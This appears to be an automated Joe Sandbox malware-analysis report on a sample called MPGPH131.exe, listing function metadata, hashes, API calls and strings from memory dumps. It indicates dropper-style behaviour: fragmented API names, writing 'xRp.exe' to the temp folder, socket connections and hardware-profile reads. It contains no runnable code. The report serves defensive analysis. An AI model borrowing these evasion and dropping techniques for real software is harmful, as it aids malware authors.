Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: dcd0f1b1e9dceb4bf7418138b0995b38554a973125db0126b28c8abff1197006
Instruction ID: cacc5ba0a5a996d98431dee7878d5519754ae1be669a52d33cb86c71b668c157
Opcode Fuzzy Hash: dcd0f1b1e9dceb4bf7418138b0995b38554a973125db0126b28c8abff1197006
Instruction Fuzzy Hash: EB610671A002049FDB08DF6CCC85BEDBBB9EF44300F148658E415A7792EB78AA80CB95

Function 00B22750 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00B22BD6
___std_exception_destroy.LIBVCRUNTIME ref: 00B22BEF
___std_exception_destroy.LIBVCRUNTIME ref: 00B22D27
___std_exception_destroy.LIBVCRUNTIME ref: 00B22D40
___std_exception_destroy.LIBVCRUNTIME ref: 00B22EA6
___std_exception_destroy.LIBVCRUNTIME ref: 00B22EBF
___std_exception_destroy.LIBVCRUNTIME ref: 00B23709
___std_exception_destroy.LIBVCRUNTIME ref: 00B23722

Strings

value, xrefs: 00B2362F

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 91abd5cb8b3f94f8c85e7a21865e5fa36d148b373a1e2f2be7aada1d6f59f45d
Instruction ID: ffac10b0a24f827730619cdf657bc7d0e1569dda3e1166fafd3e2a65356f412f
Opcode Fuzzy Hash: 91abd5cb8b3f94f8c85e7a21865e5fa36d148b373a1e2f2be7aada1d6f59f45d
Instruction Fuzzy Hash: F351B2B0C00258DBDF14EFA4DC85BDEBBF5AF05304F148299E449A7392D7786A89CB61

Function 00AB3B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00AB3C0F

Strings

ios_base::eofbit set, xrefs: 00AB3BB6
ios_base::failbit set, xrefs: 00AB3AC8, 00AB3BB1
ios_base::badbit set, xrefs: 00AB3BA7, 00AB3BD2, 00AB3BF3

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: c487316624e53e978aac126d7693165d634547999407734f49dd5dc359a5fe24
Instruction ID: 0739dccd9c3407a504e68a4cf16a71caf3cdd6af09a9a34b08cde7136e8c99d6
Opcode Fuzzy Hash: c487316624e53e978aac126d7693165d634547999407734f49dd5dc359a5fe24
Instruction Fuzzy Hash: 1D11A1B39107056BCB10DF59C805FEAB7ECEB15310F0485AAFA589B242EBB0E954CB91

Function 00B21CF0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 00B221D3

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: e492b31f5f669ad142f343393e775b2d5e762a9a566be8547cb71e983a5630a7
Instruction ID: bbb1e9ca95b4e0184069a13de1e76b94658dc4bb51ab48955b7e6b84f93918e1
Opcode Fuzzy Hash: e492b31f5f669ad142f343393e775b2d5e762a9a566be8547cb71e983a5630a7
Instruction Fuzzy Hash: BAE1DF71A002159FCB18DF6CD980AA9B7F5FF58310B1487AAE819EB395E730E951CB90

Function 00AB8080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00AB844D

Strings

parse error, xrefs: 00AB8149, 00AB8162
ror, xrefs: 00AB80D4

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 692c3290f2abfedd09ec07fbf807eb618790878e4c84180b24abf1abed5c2507
Instruction ID: d43c678ab274cd5761bc621903ce1687b7dd8f9cdfc7598ea336ea5eddfe6553
Opcode Fuzzy Hash: 692c3290f2abfedd09ec07fbf807eb618790878e4c84180b24abf1abed5c2507
Instruction Fuzzy Hash: 11C1E671D10649CFEB08CF68CC85BEDBBB9BF55304F148298E4046B692DB78AAC5CB51

Function 00AB7DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00AB8051
___std_exception_destroy.LIBVCRUNTIME ref: 00AB8060

Strings

[json.exception., xrefs: 00AB7E1C

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 5533e9a750fa8b0f9de7f3a5137d8c2dd1315e8c2a9dea56f413049c698e5331
Instruction ID: 8630a06e8e2aee912fb94001f68de88b748274701d2cecdcd5d6f867610bb145
Opcode Fuzzy Hash: 5533e9a750fa8b0f9de7f3a5137d8c2dd1315e8c2a9dea56f413049c698e5331
Instruction Fuzzy Hash: 9A91F8719002489FDB18DFA8CC85BEEFBB5FF55310F14425DE410AB6A2D7B4AA84C791

Function 00AB3A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00AB3C0F

Strings

ios_base::failbit set, xrefs: 00AB3AC8
ios_base::badbit set, xrefs: 00AB3BA7, 00AB3BD2, 00AB3BF3

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 69129472d2e53d23d70879c2e87c796375444c0b9992db45d3852a671921ca22
Instruction ID: be276cec5dc05ded2f634cad82330c0762826ef62bacea1f31943f58c96ac631
Opcode Fuzzy Hash: 69129472d2e53d23d70879c2e87c796375444c0b9992db45d3852a671921ca22
Instruction Fuzzy Hash: 5541E5B2910604ABCB04DF59CC45BEEFBFCEF45310F14826AF91597682E774AA40CBA1

Function 00B23850 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00B240B9
___std_exception_destroy.LIBVCRUNTIME ref: 00B240D2
___std_exception_destroy.LIBVCRUNTIME ref: 00B24BDD
___std_exception_destroy.LIBVCRUNTIME ref: 00B24BF6

Strings

value, xrefs: 00B24B03

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 738cdbf1779159359ee94492bbbe71161ea0b888b20e6201f36b531bfd716890
Instruction ID: f2c99f6967256b9b97284373e9eb589a1602f4c6bdbc425da636aecb584304a6
Opcode Fuzzy Hash: 738cdbf1779159359ee94492bbbe71161ea0b888b20e6201f36b531bfd716890
Instruction Fuzzy Hash: B651A270C00258DBDB14DFA8DC89BEEBBF4AF05304F144299E449A7792D7B46A88CF91

Function 00B28CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00B28D11

Strings

type must be string, but is , xrefs: 00B28D78
type must be boolean, but is , xrefs: 00B28E02

Memory Dump Source

Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 9f1c1d3b2364b88e39171271f2d57d601c8c976901a81fdeb96f8797bca3df0b
Instruction ID: 61882282c4163500b2b5feb6d8c40b7bf04a05eb4ccf10286768d0b7e81822ca
Opcode Fuzzy Hash: 9f1c1d3b2364b88e39171271f2d57d601c8c976901a81fdeb96f8797bca3df0b
Instruction Fuzzy Hash: 7F3119B5900144AFDB14EBA4E842BDDB7E9EB14700F1006F9F419977D2EF74A948C752

Analysis Process: MPGPH131.exePID: 7428, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	247
Total number of Limit Nodes:	40

Executed Functions

Function 01050044 Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNELBASE(00000104,?), ref: 010501FA
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 01050223

Strings

el32, xrefs: 010500FB
catA, xrefs: 010501AF
Clos, xrefs: 01050129
WinE, xrefs: 01050110
.dll, xrefs: 01050102
GetT, xrefs: 01050188
Kern, xrefs: 010500F4
Writ, xrefs: 01050148
xRp.exe, xrefs: 010501FD, 01050200
lstr, xrefs: 010501A7
dleA, xrefs: 010500D0
Crea, xrefs: 01050169
athA, xrefs: 01050199
GetM, xrefs: 010500B6
odul, xrefs: 0105022D

Memory Dump Source

Source File: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CreateFilePathTemp
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
API String ID: 1031868398-2378254480
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: 53613071c213fd2b033819c0513f2790d4aa171d1789a8e0a9f3f1142b7a72cc
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 91616174D01215DFCFA5CF98C984AAEFBB4BF44315F14C1AAE98567205C3709A81CF9A

Function 00ACD620 Relevance: 6.1, APIs: 4, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00ACD64B
socket.WS2_32(?,?,?,?,?,?,00BE50C8,?,?), ref: 00ACD6ED
connect.WS2_32(00000000,?,?,?,?,?,00BE50C8,?,?), ref: 00ACD702
closesocket.WS2_32(00000000), ref: 00ACD70D

Memory Dump Source

Source File: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true

Associated: 0000000A.00000002.4127559076.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4127703403.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128385451.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4128506607.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130276329.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130669469.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130714179.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130766188.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.4130828826.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ab0000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID:
API String ID: 3098855095-0
Opcode ID: 0b4178e9c5868c70a862bd38ffbf1d8ebbcd5e27c37184af38d449ce4e7ccf89
Instruction ID: 28645df7ffd7bcea01bdd4f1a5dc622f69d57e53b5ca76df51b78bee9027900a
Opcode Fuzzy Hash: 0b4178e9c5868c70a862bd38ffbf1d8ebbcd5e27c37184af38d449ce4e7ccf89
Instruction Fuzzy Hash: A431C1726053509BD7209F28CC84B6FB7E5FFC5364F111F2EF9A8A3290E770990486A2

Function 04FB0942 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12

Strings

c3G&, xrefs: 04FB0AA2

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: c3G&
API String ID: 2104809126-1137672199
Opcode ID: 0f20209f6f0e855f153ea3b5c0974aaa59269531070be3a95138e33f98cf0588
Instruction ID: bead6a5da0ef90b4dcf7c32b11b4c05a6508fce9a27a89a9a9adcc6aa91c2f2a
Opcode Fuzzy Hash: 0f20209f6f0e855f153ea3b5c0974aaa59269531070be3a95138e33f98cf0588
Instruction Fuzzy Hash: 0851AFEB74C2657DB20281922F64EF7676DE6C7730730C86BF883C6506EB845E4A21B1

Function 04FB0951 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04FB0A12

Strings

c3G&, xrefs: 04FB0AA2

Memory Dump Source

Source File: 0000000A.00000002.4135530935.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4fb0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: c3G&
